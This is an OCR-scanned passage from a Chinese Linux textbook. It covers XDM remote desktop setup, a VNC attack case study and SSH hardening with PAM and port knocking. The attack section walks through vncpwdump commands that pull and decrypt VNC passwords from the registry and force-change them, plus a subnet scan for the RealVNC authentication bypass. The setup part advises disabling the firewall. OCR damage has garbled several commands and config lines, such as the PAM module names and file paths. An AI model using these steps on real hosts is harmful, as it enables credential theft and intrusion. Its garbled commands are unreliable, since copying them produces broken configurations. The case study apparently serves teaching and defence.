定 ， 如 果 出 现 类 似 下 面 的 信息 就 表明 XDM 成 功 运行 : 


dp 0°0 :2s177 zs:* 32009/xdm 


否则 ， 可 以 通过 运行 “xdm -debug 1” 来 确定 是 什么 原因 导致 XDM 不 能 监听 177 端口 。 
如 果 是 因为 XFS 没有 运行 ， 则 可 以 通过 “service xfs start” 命 令 来 启动 XFS; 如 果 文 件 
/usr/X11R6/lib/X11/fonts/misc/fonts.alias 不 允许 XDM 读 也 会 出 现 问题 ， 可 以 通过 chmod 命令 
使 该 文件 任何 用 户 都 可 以 读 。 其 他 问题 可 根据 Debug 的 提示 ， 修 正 后 再 启动 XDM， 直 到 它 绑 
定 了 177 端口 。 

另外 ， 如 果 Linux 主机 设置 了 防火 墙 ， 必 须 设置 允许 远程 机 器 连接 XDM 监听 的 端口 ， 否 
则 连接 不 成 功 。 如 果 不 想 每 次 使 用 远程 桌面 的 时 候 都 要 先 运 行 XDM， 可 以 设置 启动 文件 ， 让 
系统 启动 的 时 候 自动 启动 XDM。 


14.1.4 ”Windows 下 X-Win32 连接 设置 


Windows 下 有 好 几 款 软件 可 以 通过 XDMP 连接 Linux 主机 ,其 中 X-Win32 是 比较 著名 的 ， 
可 以 到 http:/www-.starnet.com/ 下 载 这 个 软件 。 该 软件 是 共享 的 ,如果 没有 注册 ,每 次 只 能 使 用 
30 分 钟 ， 但 没有 使 用 次 数 的 限制 。30 分 钟 限 制 到 了 以 后 ， 重 新 启动 该 软件 就 又 可 以 使 用 。 

X-Win32 的 安装 过 程 很 简单 ， 没 有 特别 需要 注意 的 地 方 。 安 装 完 软件 ， 首 先 在 “开始 ” 
菜单 中 选择 X-Config。 在 随后 弹出 的 X-config 对 话 框 窗口 中 ， 单 击 Wizard 按钮 ， 建 立 自己 的 
Session， 选 择 连接 Linux 主机 使 用 的 协议 XDMCP， 如 图 14.6 所 示 。 


交 x-win32 - 会 话 向 导 


欢迎 使 用 会 话 向 导 请 为 悠 的 会 话 选 择 一 个 名 称 和 类 型 ,完成 后 请 选择 “下 一 步 ”。 
名 称 : [cheneuanel 


图 14.6 选择 连接 Linux 主机 使 用 的 协议 XDMCP 
下 面 一 步 就 是 在 图 14.7 所 示 的 对 话 框 中 ， 输 入 Linux 主机 的 他 地址 。 


图 14.7 输入 Linux 主机 的 卫 地 址 


图 14.7 中 需要 填写 的 项 目 说 明 如 下 。 

@ 会 话 名 称 : 填写 方便 记忆 的 名 字 即 可 。 

@ XDMCP 模式 : 查询 。 

@ 主机 : 填写 Linux 主机 的 JP 地 址 或 主机 名 称 。 

@ 监视 器 : 根据 需要 选择 监视 器 的 数量 。 

Session 设置 完成 之 后 ， 通 过 “开始 ”菜单 运行 X-Win32。 稍 等 片刻 ， 在 系统 托盘 栏 里 就 
会 看 到 一 个 像 和 一 样 的 图 标 ， 用 鼠标 右键 单 击 该 图 标 ， 在 弹出 的 菜单 中 选择 一 个 Session， 连 
接 到 相应 的 Linux 主机 。 

如 果 连 接 Linux 主机 成 功 ， 将 会 弹出 一 个 窗口 ， 其 中 包含 XDM 登录 框 。 当 输入 正确 的 用 
户 名 和 密码 后 ， 稍 等 一 会 ， 屏 幕 上 就 会 出 现 跟 Linux 主机 上 的 图 形 界面 相同 的 窗口 ， 可 以 在 这 
个 窗口 中 对 Linux 进行 各 种 操作 。 


注意 : 可 以 通过 “安全 性 ”选项 卡 中 “ 仅 允 许 这 些 主机 地 址 ”来 添加 您 允许 的 瑟 地 址 列 
表 ， 如 图 14.8 所 示 。 


图 14.8 ”添加 允许 的 他 地 址 列表 
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另外 , 如 果 连 不 上 , 可 以 用 “#service iptables stop” 停 止 防火 墙 , 再 用 其 他 工具 连接 Linux， 
我 们 还 可 以 用 Xmanager 3.0 连接 Linux。 

如 果 要 每 次 开机 都 自动 启动 X-Window 需要 配置 /etc/inittab 文件 的 第 18 行 ， 将 
id:3:initdefault: 改 成 id:5:initdefault: ， 保 存 退 出 ; 如 果 您 用 的 是 Rhel 54， 则 修改 
/etc/gdm/custom.conf 配置 文件 ， 在 第 46 行 [xdmcp] 选 项 下 面 新 增 一 行 Enable=1， 保 存 退出 ， 
启动 X-Window (init 5) 使 用 root 权限， 在 CLI 执 行 init 5 或 者 startx。 


14.1.5 小结 


到 此 为 止 ， 整 个 安装 配置 过 程 就 大 功 告 成 了 。 最 后 有 一 点 值得 注意 ， 如果 Linux 主机 原来 
并 没有 安装 X-Window， 自 己 手动 安装 是 一 个 比较 繁琐 的 过 程 ， 容 易 漏 掉 一 些 包 ， 可 以 通过 
Linux 的 安装 光盘 把 相应 的 组 件 添加 上 去 。 


14.2 远程 控制 VNC 攻击 案例 研究 


在 实际 的 网 络 使 用 中 ，VNC 的 最 大 优点 就 是 跨 平台 。 因 为 不 同 的 操作 系统 的 界面 处 理 方 
法 都 不 一 样 ， 所 以 就 有 人 开发 了 不 同 的 VNC 版 本 ， 因 为 都 符合 VNC 协议 ， 所 以 兼容 性 比较 
好 。VNC 的 版 本 比较 多 ， 而 且 是 开放 源 代码 ， 每 个 人 都 可 以 不 断 改 进 它 。 正 是 基于 这 一 点 ， 
作为 被 广泛 应 用 的 一 个 远程 控制 程序 ， 很 多 攻击 者 对 VNC 的 攻击 技术 研究 热情 是 高 涨 的 ， 丝 
毫 不 亚 于 对 Windows 的 远程 桌面 (3389) 、PcAnywhere 的 攻击 研究 。 从 最 开始 爆发 出 来 的 
VNC 的 低 版 本 密码 验证 绕 过 漏洞 , 到 各 种 版 本 的 VNC 密码 破解 技术 的 公布 , 再 到 针对 各 种 版 
本 VNC 的 专门 的 攻击 程序 出 现 ，VNC 的 攻击 也 在 网 络 中 不 断 地 进行 着 。 

本 节 将 重点 介绍 针对 各 版 本 的 VNC 攻击 技术 ， 以 案例 模拟 的 方式 进行 详细 的 操作 和 原理 
讲解 ， 同 时 对 不 同 版 本 的 不 同情 况 会 有 特别 的 提示 。 

首先 我 们 看 看 VNC 运行 的 工作 流程 : 


加 VNC 客户 端 通过 浏览 器 或 VNC Viewer 连接 至 VNC Server。 

贺 VNC Server 传送 一 个 对 话 窗口 至 客户 端 ， 要 求 输入 连接 密码 ( 可 能 为 空 ) ， 以 及 存 
取 的 VNC Server 显示 装置 。 

贺 在 客户 端 输入 连接 密码 后 ，VNC Server 验证 客户 端 是 否 具有 存 取 权 限 。 

加 若是 客户 端 通过 VNC Server 的 验证 ， 客 户 端 即 要 求 VNC Server 显示 桌面 环境 。 

辆 被 控 端 将 画面 显示 控制 权 交 由 VNC Server 负责 。 

国 VNC Server 将 把 被 控 端 的 桌面 环境 利用 V N C 通信 协议 送 至 客户 端 ， 并 且 允 许 客户 
端 控制 VNC Server 的 桌面 环境 及 输入 装置 。 


14.2.1 功能 强大 的 VNC 工具 一 一 vncpwdump 


很 让 人 府 异 的 是 ， 国 内 几乎 没有 针对 VNC 攻击 技术 的 专门 研究 团队 ， 大 部 分 的 VNC 攻 
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击 技术 和 相关 工具 都 是 国外 攻击 者 推出 的 ， 所 以 如 果 要 深入 研究 VNC 的 攻防 技术 ,在 国内 比 
绞 难 找到 新 的 技术 资料 ， 如 这 里 将 要 介绍 的 vncpwdump。Vncpwdump 是 一 个 很 早 以 前 就 已 经 
推出 的 VNC 综合 性 的 攻击 和 破解 工具 ， 但 是 国内 能 下 载 到 的 基本 都 是 vncpwdump 0.0.1 版 ， 
也 就 是 最 开始 公布 出 来 的 那个 版 本 , 已 经 古老 得 基本 没有 任何 作用 了 。 最 新 的 可 以 针对 各 版 本 
VNC 进行 密码 破解 和 攻击 的 vncpwdump 是 1.0.6 版 ， 具 有 非常 强大 的 功能 。Vncpwdump 是 一 
个 开源 程序 ， 不 但 可 以 下 载 到 它 ， 还 可 以 下 载 到 它 的 源 代码 ， 以 修改 和 增加 、 删 除 相关 功能 ， 
程序 执行 界面 如 图 14.9 所 示 。 


图 14.9 vncpwdump 程序 执行 界面 


Vncpwdump 的 主要 功能 是 获取 VNC 的 密码 , 它 提 供 多 种 获取 方式 , 比如: 从 NTUSER.DAT 
文件 中 获取 、 从 命令 行 输入 获取 、 从 注入 VNC 线程 获取 、 从 注册 表 中 获取 等 。 


14.2.2 ”使 用 vncpwdump 进行 渗透 测试 


Vncpwdump 的 功能 很 多 ， 从 它 的 使 用 界面 来 看 ， 有 许多 功能 参数 。 下 面 对 各 个 参数 的 具 
体 含义 和 使 用 方式 做 简单 介绍 。 

首先 是 “-c” 和 “-s” 参 数 ， 这 两 个 参数 的 含义 是 从 注册 表 的 HKEY_CURRENT USER 或 
HKEY_LOCAL MACHINE 下 读 取 VNC 的 密码 ， 因 为 版 本 不 同 ， 上 述 两 个 注册 表 键 值 中 的 其 
中 一 个 会 存在 VNC 的 密码 。 其 中 HKCU 是 简写 ， 代 表 注册 表 中 的 HKEY_CURRENT_USER 
位 置 。 当 我 们 打开 注册 表 , 找到 相应 位 置 的 时 候 , 密码 内 容 就 逐步 浮 出 水 面 ， 如 图 14.10 所 示 。 
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下 


[ 字 守 守 守 守 守 守 于 放 守 守 守 守 革 守 守 守 寺 守土 守 | 


HKEY LOCAL MACHINEVSOFTWARENRea VNCI NnVNCS 


图 14.10 注册 表 password 键 值 


Windows Registry Editor Version 5.00 
[HKEY_ LOCAL MACHINE\SOFTWARE\RealVNC\WinVNC4] 
"Password"=hex:49,40,15,f9,a3,5e, 8b,22 
"SecurityTypes"="VncAuth" 
"ReverseSecurityTypes"="None" 
"QUueryConnect"=dword:00000000 
"QUueryOonlyIfLoggedon"=dword:00000000 
"PortNumber"=dword:0000170c 
"IdleTimeout"=dword:00000e10 
"HTTPPortNumber"=dword:000016a8 
"LocalHost"=dword:00000000 
do i ed 
"AcceptKeyEvents"=dword:00000001 
"AcceptPointerEvents"=dword:00000001 
"AcceptCutText"=dword:00000001 
"SendCutText"=dword:00000001 
"DisableLocalInputs"=dword:00000000 
"DisconnectClients"=dword:00000001 


上 面 Password 后 的 值 就 是 加 密 的 密码 ， 虽 然 我 们 不 能 直接 读 懂 它 ， 可 以 使 用 多 种 方法 来 
破解 ， 比 如 VNC 4 和 我 们 下 面 要 介绍 的 vncpwdump， 如 果 你 是 高 手 ， 那么 用 Windows 自 带 的 
计算 器 也 能 破解 。 

以 VNC 4 为 例 ， 使 用 “-s” 参 数 可 以 直接 得 到 相关 的 密码 ， 如 图 14.11 所 示 。 


DRIUERS >uncpudump -exe -s 


WNCPwdunp 
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可 以 看 到 上 面 设置 的 密码 直接 被 读 出 : “123456”。 

“-r” 参 数 后 的 说 明 是 “decrypts password in <file>”， 也 就 是 从 文件 中 读 出 密码 ， 通 常情 
况 下 ,攻击 者 会 尝试 使 用 NTUSER.DAT 文件 读 取 密码 。 NTUSER.DAT 和 NTUSER .ini 都 属于 
系统 的 用 户 配置 文件 ， 里 面 存储 了 - 些 用 户 的 相关 配置 信 ， 息 ， 有 一 些 版 本 的 VNC 会 将 密码 存 
储 于 这 个 文件 之 中 ， 不 过 大 家 不 必 担 心 ， 一 般 情况 下 这 个 文件 无 法 读 出 密码 。 


“-d” 参 数 的 说 明 是 “dumps the password by injecting into running process”， pe 
入 进程 的 方式 读 取 密码 。 在 实际 的 网 络 中 , 考虑 到 服务 器 的 稳定 性 ， 一 般 不 使 用 这 个 参数 进 
攻击 。 

“上 ”参数 和 “-e” 参 数 是 相对 应 的 配套 参数 ，“-k” 的 作用 是 在 获得 系统 中 存在 的 加 密 
VNC 密码 以 后 解密 ，“-e” 参 数 的 作用 是 将 没有 经 过 VNC 加 密 的 密码 进行 加 密 。 


先 看 看 “-e” 是 什么 效果 ， 如 图 14.12 所 示 。 


IC: \DRIUVERS >wuncpwdump-exe -e 123456 


NCPwdump v.1.8.6 by patrikBcqure -net 


图 14.12 带 “-e” 的 效果 
从 上 图 中 可 以 看 到 ， 使 用 命令 后 得 到 加 密 后 的 key 是 494015F9A35E8B22， 实 际 上 ， 这 个 
key 如 果 是 VNC 的 链接 密码 的 话 ，VNC 会 将 这 个 密码 存放 在 注册 表 中 的 一 个 固定 的 地 方 ， 每 
当 用 户 连 接 的 时 候 都 会 验证 ， 如 果 管 理 员 修改 密码 ， 这 个 值 也 跟着 改变 。 再 看 看 使 用 “-k” 参 
数 进行 解密 的 命令 ， 如 图 14.13 所 示 。 


IC: \DRIVERS >uncpwdump -exe -k 494915F9835E8B22 
WNCPwdunp v-1.9.6 by patrikecqure -net 


Password: 123456 


图 14.13 使 用 “-k” 参 数 进行 解密 


可 以 看 到 密码 “123456” 已 经 被 破解 出 来 。 

“-s” 和 “-c” 参 数 也 是 成 对 使 用 的 ， 功 能 类 似 。“-s” 参 数 用 于 直接 修改 VNC Server 的 
链接 密码 ，“-c” 参 数 用 户 修改 当前 用 户 的 密码 。 

举例 来 说 ， 如 果 使 用 “-s” 参 数 将 VNC 的 链接 密码 改 成 “123”， 则 使 用 如 图 14.14 所 示 


cqure -net 


IC: \DRIVERS >, 


图 14.14 使 用 “-s” 参 数 修改 VNC 的 链接 密码 
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这 里 需要 注意 的 是 ，vncpwdump 的 各 个 参数 都 是 区 分 大 小 写 的 ， 大 小 写 不 同 作用 也 不 同 ， 
大 家 在 实际 使 用 过 程 中 一 定 要 注意 区 分 。 在 实际 的 网 络 攻击 中 ， 当 攻击 者 无 法 获得 VNC 密码 
时 候 ， 就 可 以 使 用 “-s” 参 数 来 强制 改变 VNC 密码 ， 但 这 样 做 也 会 被 管理 员 发 现 。 


14.2.3 针对 VNC 密码 验证 绕 过 漏洞 的 扫描 


由 于 VNC Server 采用 的 RFB (远程 帧 缓冲 区 ) 协议 允许 客户 端 与 服务 端 协商 合适 的 认证 
方法 ,协议 的 实现 上 存在 设计 错误 ,可 以 使 远程 攻击 者 绕 过 认证 无 需 口令 实现 对 服务 器 的 访问 ， 
根据 这 一 特点 我 们 先 扫描 出 肉鸡 然后 实施 攻击 ， 这 里 使 用 的 工具 是 VNCScan， 虽 然 版 本 比较 
旧 ， 但 是 比较 管用 。 运 行 界面 如 图 14.15 所 示 。 


[+] Tupe UNC_bypauth <target》,《eci ption》 for more informatione 
[+] To increase the speed under linux, try ulimit -s unlimited 


图 14.15 VNCScan 运行 界面 
从 上 图 可 知 ， 这 个 程序 主要 包含 3 个 部 分 ， 分 别 是 target、scantype 和 option， 其 中 target 
用 于 定义 扫描 的 下 地 址 范围 ，scantype 确定 扫描 的 方式 ，option 是 附带 的 其 他 参数 。 
举例 来 说 ， 要 批量 扫描 内 部 网 络 中 安装 了 VNC 的 计算 机 ， 确 定 瑟 地 址 段 为 
192.168.0.1~192.168.0.254，VNC 默认 端口 是 5900， 这 样 需要 构造 的 命令 如 图 14.16 所 示 。 


ools\security\ools\Nexploit wnc wnc 小 鸡 X>UNC_bypauth-exe -i 192.168.8.1 
.168.9.254 -p 5998 -unc 


=RealUNC <= 4.1.1 Bypass huthentication Scanner 
=multi-threaded for Linux and Windo 


THREADS TOTAL/REMAINING 
:UULNERABLE 


9:99:13/B:B8:B98 


图 14.16 按 需 要 构造 一 条 命令 
其 中 有 6 个 输出 参数 ， 分 别 如 下 。 


@ FOUND: 表示 得 到 的 结果 数据 。 
@ PORT: 扫描 的 端口 数 。 


Linux ”企业 应 用 案例 精 解 


JP: 扫描 的 1P 数 。 
STATUS: 完成 进度 。 
THREADS: 线程 。 
TOTAL/REMAINING: 用 时 。 


从 结果 中 我 们 看 出 192.168.0.243 开放 了 5900 端口 。 在 实际 的 攻击 过 程 中 ,攻击 者 往往 都 
会 利用 自己 控制 的 肉鸡 进行 大 范围 的 扫描 , 如 果 只 通过 在 CMD 下 运行 并 查看 结果 , 比较 繁琐 ， 
所 以 这 个 扫描 程序 会 在 程序 目录 中 生成 一 个 TXT 文件 ， 里 面 有 扫描 结果 的 记录 ， 如 图 14.17 
所 示 。 


| 


文件 (有 ”篇 六 (格式 (Oj 得 看 M) 才 助 (H) | 


vncd:patched 
nced:banned 
connection closed 

ncd:banned 

wmcd:patched 

not_ncd:wrong datas 

vncd:patched 

wncd:banned | 
nced:patched 

mcd:banned 

wcd:banned 


图 14.17 扫描 程序 生成 的 TXT 文件 


上 图 中 真实 他 地 址 已 处 理 ,VNC_bypauth.txt 文件 会 记录 开放 5900 端口 的 下 地 址 及 VNC 
状态 。 其 中 只 有 VULNERABLE 是 存在 直接 可 以 利用 的 漏洞 , 可 以 被 攻击 者 利用 , 而 patched、 
banned 这 两 种 状态 没有 用 。 


14.2.4 小 结 


本 案例 通过 扫描 5900 端口 ， 整 理 开 放 并 存在 VNC 密码 验证 绕 过 漏洞 的 卫 地址， 通过 
vncpwdump 软件 直接 破解 密码 ;连接 成 功 后 ， 直 接 在 该 计算 机 上 执行 各 种 命令 来 实施 完全 控 
制 。 虽 然 VNC 漏洞 已 经 过 去 很 长 时 间 了 ， 但 是 通过 扫描 我 们 发 现 目前 依然 存在 很 多 VNC 漏 
洞 的 计算 机 ， 笔 者 发 现 无 论 是 Windows 平台 还 是 UNIX/Linux 平台 ，VNC 4.1.1 以 前 版 本 均 存 
在 着 RealVNC 远程 认证 绕 过 漏洞 ， 所 以 建议 大 家 安装 最 新 的 版 本 或 到 厂家 主页 

(http://www.realvnc.com/products/download.html〉 进 行 补丁 升级 ， 以 避免 此 类 问题 的 发 生 。 


14.3” ”加固 SSH 服务 器 九条 


为 了 解决 SSH 被 攻击 的 问题 ， 笔 者 查阅 了 不 少 资料 ， 也 请 教 了 很 多 老师 ， 并 经 过 实验 得 
出 了 以 下 方案 ， 可 以 用 于 应 对 此 SSH 攻击 。 总 结 如 下 : 


@ 升级 SSH 软件 版 本 避免 SSH 本 身 的 软件 漏洞 ， 目 前 OpenSSH 最 新 版 为 6.2; 
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改变 SSH 服务 端口 并 增强 配置 ; 

利用 PAM 制定 访问 用 户 列表 ; 

完全 隐藏 SSH 服务 应 用 端口 识别 有 效用 户 ; 
利用 SSH 日 志 过 滤 。 


1. 改变 SSH 服务 端口 并 增强 配置 


将 SSH 服务 端口 改 为 不 常用 的 非 标准 端口 可 以 使 一 般 的 攻击 工具 失效 ， 通 过 编辑 

/etc/ssh/sshd_config 文件 , 查找 “Port 22” 行 , 将 SSH 连接 的 标准 端口 22 改 为 新 端口 号 , 如 54321 

(注意 取消 本 行 前 面 的 “#” 注 释 符号 ， 端 口号 尽量 取得 大 一 些 ， 因 为 攻击 者 一 般 扫描 1024 以 
下 的 端口 ) ， 然 后 重启 SSH 服务 即 可 ， 以 后 每 次 客户 端 连接 需要 使 用 p 选项 ， 命 令 如 下 。 


ssh -p 54321 www.Youdomain .com 


还 可 以 进一步 编辑 配置 文件 ， 如 下 所 示 。 


Port 54321 
LoginGraceTime 30 
MaxAuthTries 3 
Protocol 2 
PermitRootLogin no 


上 述 配置 中 ，“LoginGraeeTime 30” 设 置 登 录 超时 时 间 为 30 秒 ， 如 果 用 户 在 30 秒 内 未 
登录 到 系统 则 必须 重新 登录 “MaxAuthTries 3” 限 制 错误 尝试 次 数 为 3 次 ， 用 户 登 录 3 次 失 
败 后 将 被 拒绝 登录 。“Protocol 2” 禁 止 使 用 弱 协 议 ; “PermitRootLogin no” 代 表 不 允许 Root 
用 户 直接 远程 登录 。 除 此 之 外 ,还 可 以 使 用 DenyUsers、AllowUsers、DenyGroups 和 AllowGmups 
选项 实现 相应 限制 ， 有 兴趣 的 读者 可 以 多 去 尝试 。 


2. 利用 PAM 制定 访问 用 户 列表 


PAM (Pluggable Authentication Modules， 可 插入 身份 验证 模块 ) 提供 额外 的 身份 验证 规 
则 以 保护 对 计算 机 的 访问 。 如 果 一 个 程序 需要 验证 用 户 的 身份 ， 它 可 以 调用 PAM API。 这 个 
API 负责 执行 在 PAM 配置 文件 中 指定 的 所 有 检查 。 编 辑 /ete/pam.d/sshd 文件 如 下 。 


#%PAM-1.0 

account include common-account 
account required pam access.so 
auth include common-auth 

auth required pam nologin.so 
password include common-password 


session include common-session 


在 sshd PAM 文件 中 添加 pam access.so 可 以 定义 哪些 用 户 允 许 使 用 SSH 连接 服务 器 ， 
pam access.so 基于 /etc/security/access.conf 文件 的 内 容 进 行 安 全 控制 ， 编 辑 
/etc/security/access.conf 文件 如 下 。 
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+:ALL:192.168.12. 

+:chen:ALL 

+:chenchen:ALL 

:ALL:ALL 

第 一 行 允许 任何 用 户 〈ALL) 从 内 部 网 段 192.168.12.0 登录 。 后 面 两 行 允许 用 户 chen 和 
chenchen 从 任何 地 方 访问 服务 器 。 最 后 一 行 拒绝 其 他 任何 用 户 从 其 他 任何 地 方 访问 。 人 允许 多 
个 用 户 访问 的 另 一 种 方法 是 使 用 pam_listfile.so， 这 需要 创建 一 个 允许 访问 的 用 户 列表 〈 例 如 ， 
ete/ssh_ users) 。 在 /etc/pam.d/sshd 文件 中 添加 以 下 行 : 


auth required pam listfile.so item=user sense=allow 
file=/ete/ssh users onerr=-fail 


必须 修改 /etc/ssh/sshd-config 文件 让 它 使 用 PAM。 在 此 文件 中 添加 “UsePAM yes” 行 , 重 
新 启动 sshd 服务 即 可 。 


3. 隐藏 SSH 服务 ， 应 用 端口 knock 技术 识别 有 效用 户 


增强 计算 机 安全 性 的 最 后 一 种 方案 是 : 关闭 打开 的 端口 , 这 会 让 任何 攻击 都 无 法 攻破 您 的 
计算 机 。 只 向 允许 访问 的 用 户 开放 所 需 的 端口 ， 让 用 户 能 够 输入 密码 并 访问 计算 机 。 这 种 方法 
适用 于 需要 访问 不 向 公众 开放 的 服务 器 的 用 户 。 只 需 在 防火 墙 级 上 提供 一 个 额外 的 安全 层 , 需 
要 秘密 端口 的 所 有 服务 就 会 正常 工作 。 这 种 方法 的 要 点 在 于 关闭 所 有 端口 并 监视 外 部 的 连接 尝 
试 。 当 识别 出 预定 义 的 尝试 序列 ( 称 为 knock 序列 ) 时 ， 可 以 执行 打开 端口 等 操作 ， 让 外 部 的 
用 户 能 够 进来 。 复 杂 程 度 由 您 决定 ， 从 简单 的 表 《〈 比 如 依次 尝试 TCP 端口 7000、UDP 端口 
7100 和 TCP 端口 7200) 到 一 次 性 序列 集合 都 可 以 。 

外 面 的 用 户 必须 知道 使 用 SSH 所 需 的 端口 号 和 密码 ， 还 必须 知道 打开 端口 并 启用 密码 所 
需 的 序列 。 如 果 没 有 这 个 序列 ， 连 接 尝 试 就 会 失败 。 必 须 安装 守护 进程 knockd; 它 监 视 序列 ， 
当 发 现 有 效 的 序列 时 执行 相应 的 操作 。 如 果 愿 意 ， 可 以 从 头 构建 它 ， 但 是 大 多 数 〈 如 果 不 是 所 
有 的 话 ) 发 行 版 中 都 有 这 个 包 。 最 好 使 用 包 管 理工 具 安装 它 。 安 装 这 个 包 之 后 ， 必 须 编辑 
/etc/knockd.conf 文件 以 指定 端口 规则 ， 然 后 启动 守护 进程 。 为 了 完成 所 需 的 设置 ， 必须 了 解 您 
的 防火 墙 的 工作 方式 。 例 如 ， 在 SUSE 中 ， 可 以 使 用 如 下 设置 。 

[opencloseSSH] 

sequence=7000,8000,9000 

tcpflags=syn 

seq timeout=15 

cmd timeout=30 

start_ command=/usr/sbin/iptables -s %IP% -I input ext 1 -p tcp --dport 54321 
-j ACCEPT 


stop_command=/usr/sbin/iptables -s %IP% -D input ext -p tcp --dport 54321 -j 
ACCEPT 


这 个 示例 表示 用 户 依 次 在 端口 7000、8000 和 9000 上 knock 之 后 启用 SSH 访问 。 在 启动 
knockd 之 前 ， 关 闭 端 口 54321 并 尝试 远程 登录 。 这 个 尝试 应 该 会 失败 。 如 果 禁 用 SSH 访问 而 
且 不 启动 knockd 守护 进程 ， 登 录 尝 试 会 失败 


“512. 
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ssh your.site -p 54321 -o ConnectTimeout=15 
ssh: connect to host your.site port 54321:Connection timed out 


现在 ,使 用 sudo /ete/init.d/knockd start 或 sudo knockd -d 启动 端口 knockd 守护 进程 (这 两 
个 命令 是 等 效 的 ) ,然后 再 试 一 下 ; 端口 knock 序列 要 求 在 端口 7000、8000 和 9000 上 knock。 
必须 在 15 秒 内 完成 这 个 序列 。 识 别 出 序 列 之 后 端口 打开 ,必须 在 30 秒 内 登录 。 否则 ,端口 将 
再 次 关闭 。 为 了 检验 这 个 过 程 ， 回 到 您 的 远程 机 器 上 并 登录 。 这 一 次 提供 所 需 的 knock 序列 ， 
注意 ， 在 安装 knockd 时 通常 也 会 安装 knock 命令 。 如 果 不 是 这 样 ， 只 需 用 发 行 版 的 包 管理 工 
具 搜 索 它 ， 提 供 所 需 的 knock 序列 之 后 登录 成 功 。 

>knock your.site 7000 

>knock your.site 8000 

>knock your.site 9000 


>ssh your.site -p 54321 -o ConneetTimeout=10 
Password: 


如 果 提 供 了 错误 的 序列 ， 则 会 收 到 Connectiontimed out 消息 ，SSH 端口 仍然 完全 关闭 , 看 
不 出 它 是 否 存 在 。 如 果 您 的 服务 器 通过 路 由 器 连接 Internet， 就 必须 修改 它 的 配置 。 具 体 细节 
因 路 由 器 和 防火 墙 类 型 而 异 ， 但 是 一 般 来 说 应 该 打开 knock 端口 并 把 数据 包 转 发 到 您 的 计算 
机 ， 让 knockd 能 够 识别 并 处 理 它们 。 把 端口 54321 (SSH 连接 使 用 的 端口 )》 上 的 数据 包 转 发 
到 计算 机 上 的 端口 54321。 配置 计算 机 的 防火 墙 . 让 它 拒绝 对 端口 54321 和 knock 端口 的 连接 。 
尽管 路 由 器 会 打开 一 些 端口 ,但 是 对 它们 的 所 有 访问 都 会 到 达 计 算 机 的 防火 墙 。 访 问 会 被 阻止， 
除非 探测 到 正确 的 端口 knock 序列 。 


(1) knock 配置 

在 /etc/knockd.conf 文件 中 有 一 个 选项 options， 和 希望 使 用 的 每 个 序列 各 有 一 个 小 节 。 选 项 可 
以 是 大 写 、 小 写 或 大 小 写 混 合 形式 。 在 默认 情况 下 ，lmockd 监视 eth0 接口 。 要 想 使 用 另 一 个 接 
口 (例如 eth1) ， 可 以 加 上 Interface=ethl 行 。 注 意 ， 只 使 用 设备 名 而 不 是 设备 的 完整 路 径 。 

如 果 希 望 启用 日 志 记录 ， 可 以 通过 包含 useSyslog 行使 用 标准 的 Linux 日 志文 件 ， 也 可 以 
通过 包含 LogFile=/var/log/yourfile 使 用 自己 的 文件 。 但 是 ， 应 该 认识 到 日 志 记录 是 一 个 漏洞 ; 
如 果 黑 客 获得 了 日 志 ， 入 侵 者 就 会 掌握 端口 knock 序列 。 如 果 希 望 能 够 检查 knockd 是 否 仍然 
在 运行 ， 那 么 包含 PidFile=/var/log/youfile。 这 个 守护 进程 的 进程 ID (PID) 将 存储 在 这 个 文件 
中 。 应 该 通过 一 个 cron 任务 定期 检查 knockd 是 否 仍 然 在 运行 并 在 需要 时 重新 启动 它 。 注 意 ， 
当 这 个 守护 进程 停止 运行 时 ， 系 统 是 安全 的 ; 所 有 端口 关闭 ,不 可 访问 。 在 守护 进程 重新 启动 
之 前 ， 用 户 无 法 登录 。 

可 以 让 knockd 监听 多 个 序列 并 以 不 同方 式 响应 各 个 序列 。 在 前 面 的 示例 中 ， 让 knockd 
打开 SSH 端口 123; 可 以 简单 地 启用 Http 端口 ， 让 用 户 能 够 访问 web 服务 器 ， 也 可 以 运行 特 
定 的 进程 。 在 配置 文件 中 ， 每 个 序列 都 有 相应 的 小 节 。 使 用 sequence 定义 knock 序列 ， 比 如 
7000、8000、9000。 在 默认 情况 下 ，knock 使 用 TCP， 但 是 可 以 添加 UDP 以 增加 复杂 性 ， 比 
如 7000、8000: udp、9000。 除 了 使 用 固定 的 序列 之 外 ， 还 可 以 指定 一 个 包含 “一 次 性 序列 ” 
的 文件 .这 些 序列 在 使 用 之 后 就 会 删除 ， 不 能 再 次 使 用 。 指 定 这 种 序列 的 方法 如 下 : 
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one time squences=/yourpath/sequencesfile 


可 使 用 任何 文本 编辑 器 创建 此 文件 ， 其 中 每 行 包含 一 个 序列 (按照 上 面 所 示 的 格式 ) 。 应 
该 在 远程 计算 机 上 保存 此 文件 的 复制 以 便 记 住 如 何 登录 。 可 以 指定 应 该 扫描 哪些 到 达 的 TCP 
数据 包 ， 丢弃 不 与 ACK、FIN、PSH、RST、SYN 或 URG 标志 匹配 的 数据 包 。 对 于 SSH 连接 ， 
应 该 使 用 TCPFlags=SYN。 可 以 用 Seq Timeout=seconds.to.wait 指定 完成 一 个 序列 的 最 大 时 间 。 
如 果 在 此 时 间 内 没有 输入 完整 的 序列 ， 就 不 会 识别 出 它 ， 访 问 被 拒绝 。 可 以 用 
Cmd_Timeout=seconds.to.wait 指定 在 识别 出 序列 之 后 用 户 执行 第 二 个 命令 的 最 大 时 间 。 如 果 提 
供 了 knock 序列 的 用 户 没 有 快速 地 输入 下 一 个 命令 〈 例 如 登录 ) ， 端 口 会 再 次 关闭 。 


(2) knock 两 个 重要 的 参数 

下 面 介 绍 最 重要 的 参数 是 Start_command=some.command.to.execute, 它 指定 成 功 地 识别 出 
knock 序列 之 后 要 执行 的 命令 或 脚本 。 如 果 需 要 引用 卫 地 址 (例如 为 了 允许 从 他 的 计算 机 连 
接 您 的 计算 机 〉， 可 以 使 用 %IP%。 在 运行 时 ， 它 会 蔡 换 为 正确 的 值 。 在 上 面 的 示例 中 指定 : 


/usr/sbin/iptables -s %IP% -I input ext 1 -p tcp --dport 54321 -j ACCEPT 


iptables 向 提供 knock 序列 的 瑟 地 址 上 的 用 户 开 放 端 口 54321。 

另 一 个 重要 的 参数 是 Stop_command=< 跟 命令 或 脚本 >; 当 超 过 Cmd timeout 时 间 之 后 ， 
执行 它 指定 的 命令 或 脚本 。 在 这 里 ， 因 为 只 希望 打开 或 关闭 端口 54321， 所 以 使 用 单一 命令 就 
够 了 。 如 果 需 要 更 复杂 的 操作 ,可 以 通过 调用 脚本 执行 所 需 的 任何 操作 ， 甚 至 可 以 完全 不 涉及 
